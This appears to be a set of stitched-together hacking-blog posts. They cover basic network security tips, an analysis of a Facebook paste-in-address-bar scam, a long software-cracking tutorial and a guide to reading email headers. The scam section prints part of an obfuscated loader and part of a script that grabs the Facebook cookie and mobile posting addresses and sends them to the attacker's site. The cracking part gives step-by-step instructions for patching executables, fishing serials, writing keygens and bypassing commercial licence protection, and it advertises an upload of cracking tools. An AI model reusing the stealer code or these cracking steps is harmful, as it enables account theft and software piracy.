The main reason hacking attempts succeed is that the average internet user believes setting up network security is a complex process and so ignores it altogether. However, as many experts have explained, protecting your computer and network from intrusion is quite an easy task. It is more or less a matter of simple precautions that keep your system from being compromised. Here are a few such measures you can take to avoid being the target of a cyber attack:
1. Operating system vendors regularly release updates that address security problems in their operating systems. Make it a habit to keep your operating system updated.

2. Be aware that many system hacks are due to user passwords that are easy to guess. Make all your passwords a combination of symbols, numerals and letters so that they are hard to guess.
3. Use a router for any type of internet connection. Routers use Network Address Translation (NAT), which behaves somewhat like a firewall: unsolicited inbound connections have no internal host to reach, so a port scan from the internet sees the router, not your computer. The router uses the external IP address while the computer uses an internal one.
4. Use good spyware and virus scanners and keep them updated regularly. This should keep the latest viruses from affecting your system.
5. Use WPA2 encryption if you are on a Wi-Fi network. It is far more secure than WEP, which is broken.
6. If you use wireless networks, change the network's Service Set Identifier (SSID) and consider hiding it. The SSID is the unique identifier of your Wi-Fi network and is broadcast by your router, which lets devices trying to connect see your network. In your router's settings you can change the SSID from the manufacturer preset to one of your own and stop broadcasting it so the network is not listed. Note that hiding the SSID is not real protection: the name is still sent in the clear whenever a client connects, and any wireless sniffer recovers it, so WPA2 with a strong passphrase is what actually keeps others out.
7. Open Wi-Fi hotspots are networks that let users connect without a password. They seem attractive for accessing web content at places like airports.
This is where they become a dangerous option, since an intruder might connect to the same network and steal your sensitive information. One simple precaution is to limit what you access on such networks and avoid websites that require you to enter sensitive data. Users have to be aware of the threats that surround them if they want to combat them. In conclusion, you can really help protect yourself from hackers by following simple rules and precautions like the ones outlined above.

Remain Safe from Fraud and Identity Theft at Facebook

Recently I came across another JavaScript exploit on Facebook. The victim is asked to paste it into the address bar, supposedly to get credits for games or to become admin of the pages they like. Stop, don't listen: it is a fraud and a cheap social engineering trick. I recently posted a trick on how to hack pages that is simple and is also part of this trick, but in that exploit it was only for hacking into a page,

but some hackers also try to get the victim's cookies and mobile email address by having them paste the code into the browser bar and hit Enter; that is a more modified form of the exploit. Hacking personal IDs isn't a good thing if you do it for bad purposes or for fun. Read my fan pages hack post for more detail. What is the personal publishing mobile email address for Facebook? It is a unique address for every profile; with it you can post statuses, photos and so on while on the go, and you can get one for any fan page too. It looks like uniqueword@m.facebook.com. What kind of code do hackers give you to steal your mobile email address and cookies? Sometimes it is plain, like javascript: ..........., but in most cases they obfuscate it so you cannot tell what it says and only the browser understands it: the strings are encoded as hex (\xNN) escapes of their ASCII characters. The usual purpose of obfuscation is to stop others stealing the source code of your hard work, and some companies use it for security, but it can also be used for hacking. If anyone gives you code like the one below, beware and don't put it in the address bar: it steals your Facebook cookies as well as your unique mobile email address. See the code below:

javascript:var _0xbdfc=["\x73\x63\x72\x69\x70\x74","\x63\x72\x65\x61\x74\x65\x45\x6C\x65\x6D\x65\x6E\x74","\x73\x72\x63","\x68\x74\x74\x70\x3a\x2f\...........x65\x2f\x6d\x6f\x62\x69\x6c\x65\x2e\x6a\x73","\x61\x70\x70\x65\x6E\x64\x43\x68\x69\x6C\x64","\x62\x6F\x64\x79"];var script=document[_0xbdfc[1]](_0xbdfc[0]);script[_0xbdfc[2]]=_0xbdfc[3];document[_0xbdfc[5]][_0xbdfc[4]](script);void(0);
(Note: I have cut part of the script so that nobody can use it for wrong purposes.)
Yes, it is an obfuscated command; only the browser understands it. If I decode it I get the path of the third-party hosted script; any available online decoder will do. This is what I got: http://www.new.........com/time/mobile.js

That is the path of the real script. If we examine it, we learn what it does: just open the obtained path in the browser address bar. Part of mobile.js:
//Append jquery library
var newjs = document.createElement('script');
newjs.setAttribute('src', 'http://s_o_c_i_a_l_g_i_f_t_s.info/jquery.js');
document.body.appendChild(newjs);
setTimeout(function(){
//Grab post form id and other stuff for posting
if(location.href == "http://www.n_e_w_s_1_7_c_h_a_n_n_e_l.com/time/index.php") {
alert("Wrong Page. You must paste the script into your browser's\n address bar on any facebook tab or window.\n\n Then Hit Enter!");
return;
}
var uid = document.cookie.match(/c_user=(\d+)/)[1];
//grab mobiles
$.get("http://m.facebook.com/upload.php", function(data){
var mydata = data;
var mobiles;
var count = 0;
$($(mydata).find('a').filter(':contains("m.facebook.com")')).
.................
top.location.href = 'http://www.n_e_w_s_1_7_c_h_a_n_n_e_l.com/time/check.php?get=1&m=,'+insert;
});
},2000);
alert("Time Checker Processing - Please wait 2 seconds and click OK to view results.");

See the alert() lines above: these appear as alerts in your browser if you put that obfuscated JavaScript in the address bar. I haven't shown the whole script here for security reasons. Another smart thing: if you paste it anywhere other than Facebook, it shows: Wrong Page. You must paste the script into your browser's address bar on any facebook tab or window. Then Hit Enter!
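The obfuscation above is only a string-array indirection: every method name and URL is stored as a \xNN-escaped string in `_0xbdfc`, and the code refers to them by index. The following added example (not code from the page) decodes that pattern offline instead of trusting an online decoder. The SAMPLE it works on is constructed in the same shape as the page's snippet, with example.net as a placeholder host; the real script location the page redacts is not reproduced.

```python
import re

# Constructed sample in the same shape as the snippet on the page: a string array
# with \xNN escapes referenced by index. example.net is a placeholder host.
SAMPLE = r'''javascript:var _0xbdfc=["\x73\x63\x72\x69\x70\x74","\x63\x72\x65\x61\x74\x65\x45\x6C\x65\x6D\x65\x6E\x74","\x73\x72\x63","\x68\x74\x74\x70\x3a\x2f\x2f\x65\x78\x61\x6d\x70\x6c\x65\x2e\x6e\x65\x74\x2f\x74\x69\x6d\x65\x2f\x6d\x6f\x62\x69\x6c\x65\x2e\x6a\x73","\x61\x70\x70\x65\x6E\x64\x43\x68\x69\x6C\x64","\x62\x6F\x64\x79"];var script=document[_0xbdfc[1]](_0xbdfc[0]);script[_0xbdfc[2]]=_0xbdfc[3];document[_0xbdfc[5]][_0xbdfc[4]](script);void(0);'''

_ARRAY = re.compile(r'var\s+(?P<name>_0x[0-9a-fA-F]+)\s*=\s*\[(?P<body>.*?)\];', re.S)
_STRING = re.compile(r'"((?:[^"\\]|\\.)*)"')   # one JS string literal, escapes kept
_HEX = re.compile(r'\\x([0-9a-fA-F]{2})')
_UNICODE = re.compile(r'\\u([0-9a-fA-F]{4})')


def decode_js_string(s):
    """Turn \\xNN and \\uNNNN escapes back into characters."""
    s = _HEX.sub(lambda m: chr(int(m.group(1), 16)), s)
    return _UNICODE.sub(lambda m: chr(int(m.group(1), 16)), s)


def deobfuscate(src):
    """Resolve the string-array indirection and return the readable code, the decoded
    strings, and every URL the script reaches out to."""
    m = _ARRAY.search(src)
    if not m:
        raise ValueError("no string array found")
    name = m.group("name")
    strings = [decode_js_string(s) for s in _STRING.findall(m.group("body"))]
    code = src[m.end():]
    # pass 1: _0xbdfc[3] -> "http://..."
    code = re.sub(re.escape(name) + r'\[(\d+)\]',
                  lambda mm: '"' + strings[int(mm.group(1))] + '"', code)
    # pass 2: document["createElement"] -> document.createElement
    code = re.sub(r'\["([A-Za-z_$][\w$]*)"\]', r'.\1', code)
    urls = re.findall(r'https?://[^\s"\']+', code)
    return {"strings": strings, "code": code, "urls": urls}


if __name__ == "__main__":
    out = deobfuscate(SAMPLE)
    print(out["code"])
    print("loads:", out["urls"])
```

The readable result is a three-line script loader: create a `<script>` element, point its `src` at the attacker's host, append it to the page. Nothing in the pasted snippet itself steals anything; the payload lives in the remotely loaded file, which is why the URL list is the part worth keeping for blocking and for checking who else on the network fetched it.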

What to do if you followed the hacker's guide and pasted the script into the browser address bar? The answer is simple: reset your Facebook unique mobile email address. 1. Go to http://m.facebook.com/upload.php 2. Log in with your Facebook email and password. 3. Reset your address by clicking Reset Address. Since the script also grabs your cookies, log out of all active sessions and change your password as well.

CYBER CRIME


Black Hat Money Maker Tutorial:


RF HACKING:


Software Security and Reverse Engineering
What is reverse engineering? Today the software market is full of protected applications that do not let you use all their features unless you are a registered user. Reverse engineering is simply the art of removing protection from programs, also known as "cracking". In other words, cracking is described as follows: "When you create a program you engineer it; in fact you build the executable from the source code. Reverse engineering is simply the art of generating source code from an executable. Reverse engineering is used to understand how a program performs an action, to bypass protection, etc. Usually it is not necessary to disassemble all the code of the application; only the part we are interested in must be reversed. Reverse engineering is used by a cracker to understand the protection scheme and to break it, so it is a very important thing in the whole world of cracking." In short: "Reverse engineering refers to a way to modify a program so that it behaves the way the reverse engineer wishes." "Cracking is a method of making a software program function other than as it was originally intended, by investigating the code and, if necessary, patching it."
A little bit of history. Reverse engineering most probably started with DOS-based computer games. The aim was for a player to have full life and weapons in the final stage of the game, so what a reverse engineer did was find the memory locations where life and the number of weapons were stored and modify those values, using memory-cheating tools such as Game Hack, so that they had full life and arms at the last stage. But with the advent of the shareware concept, more and more software authors release shareware versions, and reverse engineering has become more tedious, more complex and trickier. Today programmers use various techniques to protect software; some are old, bad, repetitive techniques and some are new. We discuss them in the next section.
Various Protection Schemes

Following are the most commonly used schemes:
1) Hard-coded serial
2) Serial number + name protection
3) Nag screen
4) Time trial
5) Dongle (hardware protection)
6) Commercial protection
7) Other (CD-ROM check, key files, disabled functions, etc.)
Let's study these in detail.
1) Hard-coded serial: this is the simplest protection of all. You only have to enter a serial number, and it is the same for every user. The serial entered is compared to the original serial through an algorithm, and if it matches the software is registered.
2) Serial number + name protection: here you enter a name and a serial number. Your serial is compared with the original serial, which is derived from your name using some algorithm. This protection is sometimes easy and sometimes hard, depending on the algorithm the programmer uses. The widely used WinZip is an example of this type.
3) Nag screen: a screen appears each time the user starts the application, reminding them how many days are left, that the software is unregistered, or some other message. This is a little hard to remove, and most newcomers find it difficult, much as a new programmer struggles with pointers (WinZip again is an example). But a reverser with enough knowledge of the Windows API can easily remove a nag screen.
4) Time trial: according to +ORC, this kind of protection uses one of the following schemes or a combination of them:

a) A predetermined number of days, say 30, starting from the day of installation. This is referred to as "CINDERELLA" protection.
b) A predetermined period ending at a specific fixed date, independent of the start date: "BEST_BEFORE a given date" protection.
c) A predetermined number of minutes and/or seconds each time you run the program: "COUNTDOWN" time protection. Examples are games and audio/video players that let an unregistered user play for some amount of time, say 5 minutes.
d) A predetermined number of times you can use the program, say 30 times. Strictly speaking these protections are not time dependent; they depend only on how many times you execute them.
5) Dongle protection: this is supposed to be the toughest protection to crack. It consists of an EPROM connected to a port on the computer. The protected program first checks that the dongle is present and then checks whether the program is registered. Its implementation is hard, so this protection is not very widely used; it is found in big, expensive shareware. The dongle sits on an I/O port (usually the LPT parallel port, or another port): you need the registration hardware attached to your PC to make the program fully work, otherwise it expires after xx days / xx uses, is crippled, or does not work at all. Dongles such as HASP and Sentinel are the most common. Dongles use DLLs/VxDs to check "is registered", and the dongle API is also used for some checks. Examples of programs using this protection include some versions of CAD software.
6) Commercial protection: most software programmers don't want to spend their precious time deciding what kind of protection to use for their

software, because they think that instead of spending time designing the security algorithm they should spend it improving the functionality of the program. Hence the concept of commercial protection: some companies design only security algorithms for various software. They also provide general software that converts a fully functional program into an unregistered version, and after payment and entry of the registration details it is converted back into the fully functional registered version. Companies that use commercial protection for their software include Macromedia and Symantec, and companies that provide it include Preview Systems (VBox protection). Although this kind of protection is quite secure because it is professionally designed, it has a major disadvantage: "if a person cracks only one program protected by this scheme, he has cracked every program that uses it". For example, once a cracker had cracked Flash MX (protected by VBox) he could easily crack all the Macromedia software such as Dreamweaver MX, because all those programs rely on the same protection. And in the real world there is no protection that is still uncracked.
7) Other protections: there are many other techniques used to protect software, generally in computer games, such as CD-ROM checks, disabled functions, etc. Most computer users are familiar with these and have seen them. For example, if a user doesn't have the CD for a particular game, he cannot play the game directly from the hard disk, because the program checks for the CD-ROM when it runs.
Also some protection schemes have disabled functions: for example you cannot save your work, or you cannot use a particular function, etc.

So I hope now you understand all the protection schemes used to protect software. OK, let's study how reverse engineering is done. The first thing to keep in mind is that a cracker always works with the disassembly and is familiar with the Windows API. Now all of us computer users know that the computer only understands binary, nothing else. So first we create a program and then compile it. What the compiler does is check the syntax for any errors and then generate the .obj file. In a high-level language some functions are prewritten and stored in library files, hence after this we use a linker which links the program with the library files; after linking we get an .exe file. So the .exe file we use is nothing but a collection of instructions in binary format. Now to reverse engineer, there are different tools available.

TOOLS OF THE TRADE

The popularity of Windows and the ease of creating programs for this platform have led to the development of thousands of shareware programs. Crackers usually work with the assembly code, reverse engineering it, and have an excellent grasp of the Windows APIs as well. There is no one particular method to crack a program. Depending upon the program and the kind of protection it has, crackers employ different techniques to get into the program. But there are some common tools that crackers employ to start cracking the program. These programs are perfectly legal and useful by themselves. They are:

1) Debugger
2) Disassembler
3) Hex editor
4) Unpacker
5) File analyzers

6) Registry monitor
7) File monitor

These are the tools which a cracker uses to reverse engineer any software. Let us take a detailed look at them.

1) Debugger: - all of us know that a debugger is a utility to debug programs. A programmer uses a debugger to find bugs in their program. The debugger is the only tool by which we can trace/break a function or code live. There are many debuggers available in the market. We all know how to debug a program: first we put a breakpoint on the required statement and then we run the program. When this instruction is about to be executed the program stops and we can see the values! This is directly related to cracking. Generally a software programmer uses Windows API functions to get the serial number or to create nag screens or dialog boxes. Now if a debugger supports breakpoints on the execution of an API, then a cracker easily sets a breakpoint on an API such as "GetWindowTextA" and, after tracing only a few lines of code, can find the algorithm used to generate the key, and the key itself! There are many debuggers available in the market, but one of the most popular and powerful is SOFTICE from NuMega Corporation. This debugger is so powerful that an earlier version of it was used to crack itself! Almost every cracker in this world uses this debugger. So after seeing its misuse NuMega Corporation put some restrictions on the sale of this great debugger, and a buyer must show that he will not use it for illegal activities. But a cracked copy of this debugger is freely available on the net. This is a system-level debugger, which works directly between the computer's hardware and Windows. We cannot load this debugger within Windows; we must load it before Windows loads into memory. It can monitor every process and thread silently in memory until we call it up using hotkeys.

It allows us to patch memory at run time (not permanently, hence we have to use a hex editor), view the contents of the registers, the contents at a memory address, etc.

2) Disassembler: - As an executable file is in binary format, a normal user cannot understand the instructions in this file. Also any .exe or executable is generally in PE format (which is a standard format for .exe files, decided by a committee of software companies like Microsoft, IBM and AT&T; for more about .exe files search any virus-related site or simply search your favourite search engine). Hence a cracker first disassembles the program. A disassembler converts the binary file into its equivalent assembly language instructions. Most programs are written in a high-level language, hence the size of the disassembly runs into millions (or even more) of lines, and it is not possible for any cracker to understand all of this code. So crackers generally look for strings in the disassembly such as "your 30 day trial period has expired." or "the serial no you entered is not valid!!!" etc. Then they trace the assembly code back some lines and simply reverse the jumps (for example one jump) so that control does not reach this string and instead goes to a statement such as "thanks for registration!!!" (we will see later how this can be done, but currently this info is enough for you). Now there are many disassemblers available, but the two most commonly used are WIN32DASM and IDA. IDA is a more powerful disassembler than WIN32DASM and is used for advanced cracking, but WIN32DASM is the most widely used by newcomer and intermediate crackers. It allows you to disassemble any file which is in PE format; we can save the disassembly; it can tell us which functions are imported and which are exported; we can execute jumps and calls, find string data references and dialog references easily; and it provides many more facilities, like executing the .exe

file, stepping into it, stepping over, and so on.
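The string search described above cuts both ways: it is also the first thing a developer should run against their own release build, because a plaintext failure message sitting next to the check is exactly what makes the disassembly easy to navigate. The following is an added example (not code from the book, and not W32DASM's own logic): a small `strings`-style scanner that pulls printable ASCII and UTF-16LE runs out of a byte blob and flags the ones that look like licensing messages. `SAMPLE_BINARY` and the `LICENSE_HINTS` list are constructed here; the blob stands in for a compiled .exe.

```python
import re

# Substrings that usually betray licensing or trial logic (constructed list).
LICENSE_HINTS = ("trial", "expired", "serial", "registration", "registered",
                 "invalid key", "license", "licence")


def _patterns(min_len):
    # Printable ASCII run of at least min_len bytes, and the UTF-16LE
    # equivalent (each ASCII character followed by a NUL byte), which is how
    # many Windows binaries store their message text and which a plain ASCII
    # scan silently misses.
    ascii_re = re.compile(rb"[\x20-\x7e]{%d,}" % min_len)
    utf16_re = re.compile(rb"(?:[\x20-\x7e]\x00){%d,}" % min_len)
    return ascii_re, utf16_re


def extract_strings(blob, min_len=6):
    """Return (offset, text, encoding) for every printable run in blob, sorted by offset."""
    ascii_re, utf16_re = _patterns(min_len)
    found = [(m.start(), m.group().decode("ascii"), "ascii")
             for m in ascii_re.finditer(blob)]
    found += [(m.start(), m.group().decode("utf-16-le"), "utf-16-le")
              for m in utf16_re.finditer(blob)]
    return sorted(found)


def license_strings(blob, min_len=6):
    """Only the strings that look like licensing or trial messages."""
    return [text for _, text, _ in extract_strings(blob, min_len)
            if any(hint in text.lower() for hint in LICENSE_HINTS)]


# Constructed stand-in for a compiled executable: a few opcode-like bytes
# around an ASCII failure message, an ASCII success message, and one
# UTF-16LE message. Not a real binary.
SAMPLE_BINARY = (
    b"\x55\x8b\xec\x83\xec\x10"
    + b"Your 30 day trial period has expired.\x00"
    + b"\x90\x90\xc3\x00\x01"
    + b"Thanks for registration!!!\x00"
    + b"\x00OK\x00\xe8\x00\x00\x00\x00"
    + "The serial no you entered is not valid!!!".encode("utf-16-le") + b"\x00\x00"
)

if __name__ == "__main__":
    flagged = set(license_strings(SAMPLE_BINARY))
    for off, text, enc in extract_strings(SAMPLE_BINARY):
        mark = "LICENSE" if text in flagged else ""
        print(f"{off:#06x} {enc:<9} {mark:<7} {text}")
```

Run it over a real build with `open(path, "rb").read()` in place of `SAMPLE_BINARY`; every line it flags is a landmark a disassembler user gets for free, so a release checklist item is to make sure none of them sits a few instructions away from the decision it describes.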

3) Hex editor: - as I mentioned above, SoftICE can change the value at a memory location only at run time. This is not useful, and not a good crack, if we have to change the value each time we run the program. Therefore we use hex editors. A hex editor allows us to change the contents of any file in hex format; it displays the contents of the file in hex. We simply have to change the value at the location which we found using SoftICE. There are a lot of hex editors available such as UltraEdit, BIEW, HIEW and many more (I think many C and C++ programmers have developed one). But the most popular among these is HIEW, which stands for "Hacker's vIEW". This little program offers a lot of facilities such as editing in hex or ASCII format and searching for any string in hex or ASCII format. Another good facility which makes it different from the others is that it lets you write assembly code and automatically converts that code into the equivalent hex. This is helpful for crackers who don't know the hex equivalent of an assembly instruction. (For example, if we have to change a jump to a nop at some location, then after pressing the F7 key we can just write nop and it will automatically convert it to its hex equivalent, which is 90.) There are other hex editors also, but this is the most widely used.

4) Unpacker/PE editor: - sometimes programmers use a file compressor such as UPX or ASPack to reduce the size of the program. This is called a file packer. What a packer does is compress the file using some algorithm and append its own code to the .exe; at run time the unpacker code is executed first, and it decompresses (unpacks) the program in memory. Since the program we have to crack exists unpacked only in memory, a cracker cannot simply disassemble and patch the program; it can only be patched at run time. Therefore to unpack the .exe file permanently we use an unpacker, which unpacks the .exe file so that we can store the unpacked file on disk. If a program is using a packer then its .exe header will be changed. There are various techniques to manually unpack an .exe by modifying the .exe header, but those are advanced techniques and I don't want to discuss them here because I think most newbies would find them difficult to understand. The most widely used unpacker is ProcDump. This software has the ability to unpack different kinds of packers stand-alone. It also allows viewing or changing the header of .exe files.

5) File analyzers: - To identify which packer was used to pack a file, crackers use this kind of program. By using this, a cracker can know which compiler or packer was used to protect the shareware. This software simply works on signature bytes. With the help of

this you can find out which compiler, or which language, the program was written in. There are many programs of this kind available, such as File Inspector, File Info etc.

6) Registry monitor: - Some programs use registry keys to store their registration information. Hence a 'registry monitor' is software which works in the background and traps all the registry accesses made by all the processes currently running.

7) File monitor: - some programs also use a key file, or they have their security algorithm

in a different file, and hence a file monitor is used to see which application is using which file.

Bypassing the protection: How programs are reverse engineered

In my previous article I discussed the different protection schemes and the tools used for cracking. In this article I show you how crackers get past all these protections. There are different ways to crack. These approaches depend on different knowledge, different types of cracker and different personal preferences. An example can be more useful than a thousand words. There are three types of approach in cracking shareware programs that need a serial number to register or that have nag screens. They are:

1) Serial fishing
2) Bypassing the check, also called patching
3) Making a key generator

The first method is the simplest and fastest and can be used by a normal cracker. The last one is more complex: in fact, you need to understand the whole serial number check routine and then you have to code a program based on it which generates the key according to the input. The advantage of this method is that the serial number can be used for further versions of

the program, for different computers or for different users. So the choice is determined by the level of knowledge, the time the cracker has and his style of cracking. Let's have a detailed look at them.

1) Serial fishing: - serial fishing is supposed to be the cleanest method to crack any program. This method is also known as live cracking because we find the correct serial only at run time, i.e. while the program is executing. Serial fishing deals with finding the correct serial and then registering the software using that serial number. In serial fishing we don't have to modify the code; we simply have to inspect or analyze it. First we enter any fake, i.e. wrong, serial number of our choice, say 123456. This serial number is compared with the correct serial, hence we only have to find the memory location or register where the correct serial number is stored. The general routine in a high-level language to compare the serial number is as follows:

    If (entered serial = correct serial) then
        Register program (do some modification in the program or store the registration information)
        Message box ("successfully registered")
    Else
        Message box ("sorry!! Your serial number is not valid")

And in assembly the general routine is as follows. In assembly all the data is stored in registers or at memory locations. Suppose the eax register holds the fake serial and ebx holds the correct serial. Now the routine is:

    100aa:  cmp eax, ebx
    100bb:  jz 100xx          ; jump if our serial is correct
    100cc:  mov ax, yyyy
    100dd:  other code...

    100xx:  code for the message box "successfully registered"
    100yy:  code...

Here 100xx etc. are memory locations. What is happening is that both serial numbers are compared using the cmp instruction, and if the two serials are equal then control jumps to the message that we have entered the correct serial. Otherwise control passes to the next statement, which is 100% sure to be something like "you have entered an invalid serial". It is not necessary that cmp is always used, but mostly it is used to compare the serial. Now the programmer uses Windows APIs such as GetWindowTextA or GetDlgItemTextA to get the serial number. As I mentioned, SOFTICE allows us to set a breakpoint on a Windows API. Hence a cracker simply puts a breakpoint on such an API, and when the program breaks on it after the serial number is entered, the cracker traces the disassembled code to find the correct serial. While tracing, crackers simply search for a conditional jump such as jne, jz or jae after a cmp instruction. In short they check for the routine I mentioned above, and in this way a cracker can find the whole algorithm and the correct key with simple SoftICE commands such as:

    d eax
    ? eax

Here "d eax" displays the contents of the register eax in hex format, and "? eax" displays the contents of eax in ASCII format (these are SoftICE commands). After finding the correct key he can easily register the software, and if he wants to distribute the key to every user then he simply creates a key generator after analyzing the whole algorithm, because we know that in name-serial protection there is a different key for each name. Some programs also use techniques such as

appending your hard drive serial number to the end of the serial etc.; in this case the serial number is different for each computer, and hence a cracker simply writes a key generator after analyzing the whole protection scheme. Using this technique a cracker can easily defeat the first two protections I mentioned in my previous article (hard-coded serial and name-serial combination).

2) Patching: - if a program is showing a nag screen and doesn't have any option to register then we use patching. Patching is also referred to as dead cracking. Patching is not supposed to be a good crack; most crackers avoid this technique unless they have no other option. In the case of a nag screen the programmer simply uses Windows APIs such as DialogBoxParam or MessageBoxA etc. A cracker sets breakpoints on these API calls and runs the program. When the program calls the function, SoftICE pauses the execution and the cracker has to deal with the assembly snippet. The simple structure of calling a nag screen in a high-level language is as below:

    If (program is not registered) then
        Display the nag screen
    Else
        Execute the program

And in assembly the structure is as follows. Suppose that the program first checks for registration and returns the value in the eax register (eax = 1 means registered and eax = 0 means unregistered). Now this is compared as:

    dddd:  cmp eax, 1
    aaaa:  jz xxxx
    bbbb:  mov ax, 02
    cccc:  call yyyy        ; this is for calling the nag screen

    xxxx:  rest of the program...

Here aaaa, bbbb etc. are called offsets or memory locations. So what's happening here is that first the program checks whether it is registered; the registration status of the program is put into eax. Then eax is compared with 1: if eax is 1 the program is registered and we don't have to show the nag screen, else we have to show it. So we only have to reverse the jump (jz to jnz) so that the nag screen does not appear. In this case we use a hex editor such as HIEW to patch the program's .exe file.

Patching is also used to remove time-trial protections. Suppose we have a program which expires after 30 executions. Clearly, when we run the program it checks whether 30 executions are over or not. If not, it increases the number of executions by 1 and stores this value somewhere, but if 30 executions are over then it shows the message that your program has expired. The structure is the same as for the nag screen:

    aaaa:  cmp eax, 1e      ; 1E in hex = 30 in decimal
    bbbb:  jae xxxx         ; jump if greater than or equal to 30
    cccc:  mov ax, 02
    dddd:  call yyyy        ; this is for calling the nag screen
    eeee:  ret              ; stop execution and exit
    xxxx:  rest of the program...

Here what the program is doing is comparing the number of times we have used it with 30; if it is equal or above then it displays the message and exits. So what we do here is simply change the jae to jmp, so that the program always jumps regardless of whether it is registered or not.

3) Key generator: - this technique is supposed to be a little harder. In this technique a cracker needs to understand the whole serial number check routine and all of its conditions,

such as: a serial number can contain the '-' symbol, or the serial number must be 11 characters long, or the user name must not be blank, etc. This technique simply requires that a cracker understands assembly language very well and analyzes the code very carefully; he must be careful to analyze each line of code, because a small mistake in understanding the code can produce unexpected results.

Now let's see how crackers get past commercial protection. Today many commercial protections use different techniques to fool the cracking tools, such as anti-disassembler code, anti-SoftICE tricks etc., hence these protections are harder for a newcomer to crack. First let's see how this kind of program protects the software. There is a common DLL, or say binary file, for all the software which uses a particular commercial protection; for example the entire Macromedia product line uses the same protection, 'VBox', and all the files related to VBox are stored in the c:\programfiles\comman\vbox directory. When a user runs the program, the VBox files are executed first. They check whether the program is registered or not; if it is not registered they check the 30-day trial period, and if the trial has not expired they execute the program. Commercial protection includes many checks, so a cracker cannot easily patch the program. The most popular trend among crackers is simply to BYPASS this kind of protection. As I mentioned, VBox changes the header of the .exe file, and for this reason all the files related to VBox are executed before the actual .exe of the program is executed. What a cracker does is simply find the original entry point of the .exe; that is, he only has to find the point from which the original program starts its execution. For this a cracker puts a breakpoint on a Windows API such as GetProcAddress and then runs the program.
When the program executes, the VBox code runs first, so VBox calls the API GetProcAddress and SOFTICE pauses the execution of the program. Now the cracker has the assembly snippet. The rest

depends purely on the cracker's ability and experience. After tracing some lines from the VBox files a cracker can find the original program entry point. After finding the entry point the cracker simply modifies the .exe header and the IAT. From then on the program has nothing to do with the commercial protection, because the cracker has bypassed it! For each commercial protection there is a different way to crack; the method I discussed here relates only to VBox protection.

So these are all the techniques generally used in the cracking world. Nowadays there are several cracking groups specialized in reversing web scripts. There is nothing new in this, because the web pages are written in Java or CGI scripts or something else, so they can be considered small programs. Consequently this is only another type of crack. The web cracker usually reverses the protection schemes of web pages, creating cracked passwords which are distributed on the web.

To end this article I would like to mention these lines of a cracker: "There is a crack, a crack in everything. That is how the light gets in." I hope it conveys the psychology of a cracker.

Important read: This upload contains the following hacking and cracking software:

1.Clonyxxl

2.HIEW

3.OLLYDBG

4.PEID

5.Runasdate

6.SoftIce

7.W32SASM

1.Clonyxxl - ClonyXXL is a copy-protection detection scanner which can show what kind of protection is used on a disc.

2.HIEW - Hiew (short for Hacker's view) is a popular console hex editor for DOS and Windows written by Eugene Suslikov (sen). The program is particularly useful for editing executable files such as COFF, PE or ELF executable files.

3.OLLYDBG -OllyDbg is a debugger that emphasizes binary code analysis, which is useful when source code is not available.

4.PEID -PEiD detects most common packers, cryptors and compilers for PE files. It can currently detect more than 600 different signatures in PE files.

5.Runasdate -RunAsDate is a small utility that allows you to run a program in the date and time that you specify. This utility doesn't change the current system date and time of your computer, but it only injects the date/time that you specify into the desired application.

6.SoftIce - SoftICE is a kernel mode debugger for Microsoft Windows. Crucially, it is designed to run underneath Windows such that the operating system is unaware of its

presence. Unlike an application debugger, SoftICE is capable of suspending all operations in Windows when instructed.

7.W32SASM - W32DASM is the perfect utility to learn how Windows programs operate. It disassembles both 16- and 32-bit Windows programs and displays exports, imports, menu, dialog and text references.

How to crack a program: an example using an .exe file, say KeygenMe, to demonstrate how to crack a program's .exe file

1) Place KeygenMe.exe and HIEW32.exe (from the Hiew folder) on the desktop along with the folder W32Dasm 8, then double-click KeygenMe.exe and enter any value; it will give an error such as "Try again" or "invalid key".

2) Then click on W32DSM89.exe in the folder W32Dasm 8, and in the disassembler select the option 'open file to disassemble' and select the KeygenMe .exe file; it will disassemble the code.

3) After that click on the search option, then on 'find text', and in the find box type your message, in this instance "Try again"; click find next and it will find the exact string.

4) When you find the string message, press the cursor up key and you will find the specific conditional or unconditional referenced call address; find the address for this message, which in this case is 0046723E(C).

5) After that make another copy of KeygenMe.exe on the desktop by copy and paste, then drag KeyGenMe - Copy.exe onto HIEW32.exe; it opens in the blue-screen HIEW hex editor.

6) When the blue-screen HIEW hex editor opens, press function key F4 and select decode.

7) Now press F5, then ignore the leading 0s of address 0046723E, write .46723E and press enter.

8) After that press F3 and, in edit mode at 0666339, set the values 0066639 = 90, 006663A = 90, ... and so on till up to 40, that is up to 006663f = 90.

9) After that save it.

10) Update and select truncate: no.

11) Finally press F9 and F10, and done.

12) Now close it, open KeyGenMe - Copy.exe and enter any value; you get the message "you crack me" and with this you have cracked the keygen .exe file.

Backtracking EMAIL Messages

Tracking email back to its source, because I hate spammers...

Ask most people how they determine who sent them an email message and the response is almost universally, "By the From line." Unfortunately this is symptomatic of the current confusion among internet users as to where particular messages come from and who is spreading spam and viruses. The "From" header is little more than a courtesy to the person receiving the message. People spreading spam and viruses are rarely courteous. In

short, if there is any question about where a particular email message came from, the safe bet is to assume the "From" header is forged.

So how do you determine where a message actually came from? You have to understand how email messages are put together in order to backtrack an email message. SMTP is a text-based protocol for transferring messages across the internet. A series of headers is placed in front of the data portion of the message. By examining the headers you can usually backtrack a message to the source network, sometimes the source host. A more detailed essay on reading email headers can be found .

If you are using Outlook or Outlook Express you can view the headers by right clicking on the message and selecting properties or options.

Below are listed the headers of an actual spam message I received. I've changed my email address and the name of my server for obvious reasons. I've also double spaced the headers to make them more readable.

Return-Path: <s359dyxtt@yahoo.com>

X-Original-To: davar@example.com

Delivered-To: davar@example.com

Received: from 12-218-172-108.client.mchsi.com (12-218-172-108.client.mchsi.com [12.218.172.108]) by mailhost.example.com (Postfix) with SMTP id 1F9B8511C7 for <davar@example.com>; Sun, 16 Nov 2003 09:50:37 -0800 (PST)

Received: from (HELO 0udjou) [193.12.169.0] by 12-218-172-108.client.mchsi.com with ESMTP id <536806-74276>; Sun, 16 Nov 2003 19:42:31 +0200

Message-ID: <n5-l067n7z$46-z$-n@eo2.32574>

From: "Tahir" <s359dyxtt@yahoo.com>

Reply-To: "Tahir" <s359dyxtt@yahoo.com>

To: ukhacker@example.com

Subject: STOP-PAYING For Your PAY-PER-VIEW, Movie Channels, Mature Channels...isha

Date: Sun, 16 Nov 2003 19:42:31 +0200

X-Mailer: Internet Mail Service (5.5.2650.21)

X-Priority: 3

MIME-Version: 1.0

Content-Type: multipart/alternative; boundary="MIMEStream=_0+211404_90873633350646_4032088448"

